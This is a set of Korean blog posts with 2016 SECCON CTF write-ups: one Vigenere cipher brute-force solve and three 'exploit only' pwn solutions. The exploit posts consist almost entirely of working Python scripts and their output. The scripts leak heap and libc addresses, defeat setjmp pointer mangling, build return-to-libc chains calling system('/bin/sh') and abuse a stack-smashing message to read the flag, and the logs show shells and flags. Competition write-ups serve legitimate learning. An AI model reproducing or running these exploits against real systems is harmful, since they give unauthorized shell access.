반응형

[문제]

Vigenere

k: ????????????

p: SECCON{???????????????????????????????????}

c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ

k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe

[풀이]

import md5

p = "SECCON{???????????????????????????????????}"
c = 'LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ'
m = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}"
a = []
for i in range(len(p[:7])):
    for j in range(len(m)):
        if m[j] == p[i]:
            a.append( j )

b = []
for i in range(len(p[:7])):
    for j in range(len(m)):
        if m[j] == c[i]:
            b.append( j )
_k = ''
for i in range(len(b)):
    _k += m[b[i]-a[i]]

print "[+] key:", _k+("?"*(12-len(_k)))

##############
a = []
for i in c:
    for j in range(len(m)):
        if m[j] == i:
            a.append( j )

b = []
for i in _k:
    for j in range(len(m)):
        if m[j] == i:
            b.append( j )

## b/f    
print "[!] b/f ..." 
q = b
for z in m:
    for y in m:
        for x in m:
            for u in m:
                for o in m:
                    k = z+y+x+u+o
                    d = []
                    for i in k:
                        for j in range(len(m)):
                            if m[j] == i:
                                d.append( j )
                    o = b+d
                    flag = ''
                    for i in range( len(a) ):
                        flag += m[(a[i]-o[i%len(o)])%len(m)]
                    _md = md5.new( flag ).hexdigest()
                    if _md == "f528a6ab914c1ecf856a1d93103948fe":
                        print "[+] key:", _k+k
                        print "[+] flag:", flag
                        exit()

'''
blackcon@bk{~/seccon/crypto}:python vigenere.py
[+] key: VIGENER?????
[!] b/f ...
[+] key: VIGENERECODE
[+] flag: SECCON{ABABABCDEDEFGHIJJKLMNOPQRSTTUVWXYYZ}
'''
저작자표시 (새창열림)

'Security > [게임] CTF 풀이' 카테고리의 다른 글

[Kinght CTF] Fix It Felix! writeup  (0) 2022.01.23
[exploit] 2016 33c3 CTF - babyfengshui  (0) 2016.12.30
[exploit] 2016 SecconCTF - jmper writeups (exploit only)  (0) 2016.12.11
[exploit] 2016 SecconCTF - cheer_msg writeups (exploit only)  (0) 2016.12.11
[exploit] 2016 SecconCTF - checker writeups (exploit only)  (0) 2016.12.11
반응형
#!/usr/bin/env python
import socket
import telnetlib
import struct
from collections import deque

p = lambda x:    struct.pack( "<I", x )
up = lambda x:  struct.unpack( "<I", x )[0]
host = "localhost"
host = "jmper.pwn.seccon.jp"
port = 5656
s =  socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )

def u_recv( st ):
    bf = ''
    while st not in bf:
        bf += s.recv( 1 )
    return bf

def ror( val,rotate ):
    d = deque(list(bin(val)[2:]))
    d.rotate(rotate)
    return int( "".join(list(d)), 2)

for i in range( 30 ):
    u_recv( "6. Bye :)" )
    s.send( "1\n" )

## stage 1: leak the heap addr
u_recv( "6. Bye :)" )
s.send( "3\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input memo:" )
s.send( "a"*32 + "\n" )

u_recv( "6. Bye :)" )
s.send( "5\n" )
u_recv( "ID:" )
s.send( "0\n" )
data = s.recv( 1024 )
data = data.split( "a"*32 )[1]
heap = up(data.split( "1." )[0])
jmpbuf = heap-0x110
print hex( heap )

## stage 2:leak the puts@got
u_recv( "6. Bye :)" )
s.send( "3\n" )
u_recv( "ID:" )
s.send( "1\n" )
u_recv( "Input memo:" )
s.send( "a"*32 + "\x78" )

u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "1\n" )
u_recv( "Input name:" )
s.send( p( 0x601fa0 )+"\n" ) # puts@got: 0x601fa0

u_recv( "6. Bye :)" )
s.send( "4\n" )
u_recv( "ID:" )
s.send( "1\n" )
base = s.recv(6)
while len(base)<8:
    base += "\x00"
base = struct.unpack("<Q", base)[0]-0x6fd60 #puts_offset: 0x6fd60
system = base+0x46590 # system_offset: 0x46590
print map( hex, [base, system] )


## stage 3:
u_recv( "6. Bye :)" )
s.send( "3\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input memo:" )
s.send( "a"*32 + "\x08" )

u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( p( jmpbuf+0x28 )+"\n" )

## stage 4:leak the randomvalue(fs:30)
pay = "a"*0x8
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( pay+"\n" )

u_recv( "6. Bye :)" )
s.send( "4\n" )
u_recv( "ID:" )
s.send( "0\n" )
leak = u_recv( "1. Add student." )
leak = leak.split( pay )[1]
leak = struct.unpack( "<Q", leak.split( "1. Add student." )[0][8:] )[0]

t = bin(leak)[2:]
t = '0'*(64-len(t)) + t
for i in range(0x11):
       t = t[-1] + t[:-1]
       rnd = int(t,2) ^ 0x400c31

## stage 5: write the new_rip
u_recv( "6. Bye :)" )
s.send( "3\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input memo:" )
s.send( "a"*32 + "\x48" )
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( p( jmpbuf+0x38 )+"\n" )

t = system ^ rnd
t = bin(t)[2:]
t = '0'*(64-len(t)) + t
for i in range(0x11):
       t = t[1:] + t[0]
       new_rip = int(t,2)

new_rip = struct.pack( "<Q", new_rip )
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( new_rip+"\n" )

## stage 6: write the cmd
u_recv( "6. Bye :)" )
s.send( "3\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input memo:" )
s.send( "a"*32 + "\x10" )
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( p( jmpbuf )+"\n" )

cmd = "/bin/sh\x00"
u_recv( "6. Bye :)" )
s.send( "2\n" )
u_recv( "ID:" )
s.send( "0\n" )
u_recv( "Input name:" )
s.send( cmd+"\n" )

u_recv( "6. Bye :)" )
s.send( "1\n" )

t = telnetlib.Telnet()
t.sock = s
t.interact()

'''
blackcon@bk{~/seccon/exploit/jmper}:./pay.py
0x243d220
['0x7f704f704000', '0x7f704f74a590']

Exception has occurred. Jump!
id
uid=10987 gid=10000 groups=10000
ls
flag
jmper
cat flag
SECCON{3nj0y_my_jmp1n9_serv1ce}
'''
저작자표시 (새창열림)

'Security > [게임] CTF 풀이' 카테고리의 다른 글

[exploit] 2016 33c3 CTF - babyfengshui  (0) 2016.12.30
[crypto] 2016 SecconCTF - Vigenere writeups  (0) 2016.12.12
[exploit] 2016 SecconCTF - cheer_msg writeups (exploit only)  (0) 2016.12.11
[exploit] 2016 SecconCTF - checker writeups (exploit only)  (0) 2016.12.11
2015 HUST hacking festival  (0) 2015.06.01
반응형
#!/usr/bin/env python
import socket
import struct
import telnetlib
p = lambda x: struct.pack( "<I", x )
up = lambda x: struct.unpack( "<I", x )[0]


host = "localhost"
host = "cheermsg.pwn.seccon.jp"
port = 30527

s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )

pppr = 0x80487ad
setbuf_got = 0x804A00c
printf_plt = 0x8048430

def u_recv( st ):
    bf = ''
    while st not in bf:
        bf += s.recv( 1 )
    return bf

## stage 1 ##
u_recv( "Message Length >>" )
s.send( "-150\n" )
u_recv( "Message >>" )

pay = p( printf_plt )
pay += p( pppr )
pay += p( 0x804887d ) # \nThank you %s!\nMessage : %s\n
pay += p( setbuf_got )
pay += p( setbuf_got )
pay += p( 0x80485ca ) # main

s.send( pay+"\n" )
data = u_recv( "Message : " )
data = u_recv( "Message : " )
data = data.split( "Thank you " )[1]
leak = data.split( "!\n" )[0]
leak = up( leak[:4] )

libc_base = leak - 0x00067b20    # setbuf offset: 0x67b20
system = libc_base + 0x00040310    # system offset: 0x40310
binsh  = libc_base + 0x16084c    # binsh offset: 0x16084c

## stage 2 ##
u_recv( "Message Length >>" )
s.send( "-150\n" )
u_recv( "Message >>" )

pay = p( system )
pay += p( 0x41414141 )
pay += p( binsh )
s.send( pay+"\n" )
print '#####'

t = telnetlib.Telnet()
t.sock = s
t.interact()

'''
blackcon@bk{~/seccon/exploit/cheer_msg}:./pay.py 
#####

Oops! I forgot to ask your name...
Can you tell me your name?

Name >> 
Thank you sY�AAAALxk�!
Message : 
id
uid=10792 gid=1001(cheer_msg) groups=1001(cheer_msg)
ls
cheer_msg
flag.txt
run.sh
cat flag.txt
SECCON{N40.T_15_ju571c3}
'''
저작자표시 (새창열림)

'Security > [게임] CTF 풀이' 카테고리의 다른 글

[crypto] 2016 SecconCTF - Vigenere writeups  (0) 2016.12.12
[exploit] 2016 SecconCTF - jmper writeups (exploit only)  (0) 2016.12.11
[exploit] 2016 SecconCTF - checker writeups (exploit only)  (0) 2016.12.11
2015 HUST hacking festival  (0) 2015.06.01
[coding] DEFCON CTF Qualifier 2015, catwestern Writeups  (0) 2015.05.18
반응형
#!/usr/bin/env python
import socket

host = 'localhost'
host = "checker.pwn.seccon.jp"
port = 1120
port = 14726

s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )

def u_recv( st ):
    bf = ''
    while st not in bf:
        bf += s.recv( 1 )
    return bf

print u_recv( "NAME :" )
s.send( "name\n" );

for i in range( 0x180, 0x170, -1 ):
    u_recv( ">>" )
    pay = ("a"*i)+"\n"
    s.send( pay )

print u_recv( ">>" )
s.send( "yes\n" )
print u_recv( "FLAG :" )

pay = "a"*0x178
pay += "\xc0\x10\x60"    # flag
s.send( pay+"\n" )

print s.recv( 1024 )
print s.recv( 1024 )
print s.recv( 1024 )

'''
blackcon@bk{~/seccon/exploit/checker}:./pay.py 
Hello! What is your name?
NAME :

Do you know flag?
>>

Oh, Really??
Please tell me the flag!
FLAG :

You are a liar...

*** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated
'''
저작자표시 (새창열림)

'Security > [게임] CTF 풀이' 카테고리의 다른 글

[exploit] 2016 SecconCTF - jmper writeups (exploit only)  (0) 2016.12.11
[exploit] 2016 SecconCTF - cheer_msg writeups (exploit only)  (0) 2016.12.11
2015 HUST hacking festival  (0) 2015.06.01
[coding] DEFCON CTF Qualifier 2015, catwestern Writeups  (0) 2015.05.18
[exploit] DEFCON CTF Qualifier 2015, babyecho Writeups  (3) 2015.05.18

+ Recent posts

티스토리툴바